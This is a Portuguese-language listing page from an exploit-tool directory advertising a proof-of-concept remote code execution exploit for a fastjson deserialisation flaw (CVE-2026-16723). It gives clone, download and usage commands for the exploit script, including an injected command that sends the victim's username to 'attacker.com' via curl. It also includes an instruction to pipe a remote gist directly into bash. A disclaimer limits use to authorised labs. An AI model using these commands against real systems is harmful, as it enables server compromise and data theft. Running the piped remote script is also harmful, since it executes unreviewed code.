Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-16723 — CVE-2026-16723 | Kitploit
Ferramentas/GitHubGitHub/horkimhab/cve-2026-16723
Aprendizado e Educação
GitHubhorkimhab/cve-2026-16723

CVE-2026-16723

CVE-2026-16723

Ver RepositórioSite
11há 24 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-16723

Doar

Apoie a manutenção deste projeto com PayPal ou escaneando o código QR abaixo.

paypal

Código QR para doação

⚡ Uso Simples

Use este projeto apenas em ambientes seguros e autorizados, como:

  • Máquinas virtuais locais
  • Contêineres Docker
  • Ambientes de laboratório isolados
  • Ambientes de teste de penetração autorizados

Exemplo de configuração:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-16723
cd CVE-2026-16723

# Download fastjson JAR (optional - script will auto-download)
wget https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.83/fastjson-1.2.83.jar

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Exemplo de uso:

root@kitploit:~
# Basic exploit
python CVE-2026-16723.py -t http://localhost:8080/parse

# Custom command
python CVE-2026-16723.py -t http://localhost:8080/parse -c "id > /tmp/result"

# With custom IP and port
python CVE-2026-16723.py -t http://localhost:8080/parse -c "whoami" --remote-ip 192.168.1.100 --port 9000

# HTTPS target
python CVE-2026-16723.py -t https://target.com/api/parse -c "curl http://attacker.com/$(whoami)" --insecure

# Using proxy
python CVE-2026-16723.py -t http://localhost:8080/parse --proxy http://127.0.0.1:8080

# Custom FD range
python CVE-2026-16723.py -t http://localhost:8080/parse --fd-range 10-50

# Quiet mode
python CVE-2026-16723.py -t http://localhost:8080/parse --quiet

Nota:

  • ao clonar de outro projeto, você deve executar curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y para limpar o diretório aninhado .git
  • ex.: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Crédito ou Referência

  • https://fearsoff.org/research/fastjson-1-2-83-rce
  • https://thehackernews.com/2026/07/fastjson-1x-rce-vulnerability-targeted.html
  • https://aiweekly.co/alerts/alibabas-fastjson-1x-hit-by-active-rce-exploits-no-patch

📚 Repositório Educacional de Pesquisa em Segurança

Um repositório para aprender, testar e pesquisar conceitos de segurança cibernética em ambientes controlados.


⚠️ Aviso de Segurança e Legal

Propósito

Este repositório é exclusivamente para pesquisa de segurança educacional e autorizada.

Ele foi projetado para ajudar os usuários a aprender sobre:

  • Vulnerabilidades de segurança
  • Conceitos de sandbox e isolamento
  • Codificação segura e práticas defensivas

Somente Uso Autorizado

Use este repositório apenas em ambientes onde você tenha permissão, como:

  • Laboratórios pessoais ou máquinas virtuais
  • Ambientes Docker ou isolados
  • Testes de penetração autorizados
  • Treinamento em segurança cibernética ou pesquisa acadêmica

O uso não autorizado ou ilegal é estritamente proibido.


Sem Responsabilidade

O autor e os colaboradores não são responsáveis por qualquer dano, uso indevido, problemas legais ou perdas causados por este projeto.

Ao usar este repositório, você concorda que:

  • Você é responsável pelas suas próprias ações
  • Você o utilizará de forma legal e ética
  • O projeto é fornecido sem garantia

Uso Ético

Este projeto destina-se a:

  • Pesquisa de segurança defensiva
  • Educação em segurança cibernética
  • Conscientização sobre vulnerabilidades
  • Pesquisa segura de sistemas e software

Siga práticas de divulgação responsável e cumpra todas as leis aplicáveis.


Contato

Para divulgação responsável ou colaboração, entre em contato com o mantenedor do repositório pelo GitHub.

Baixar ferramenta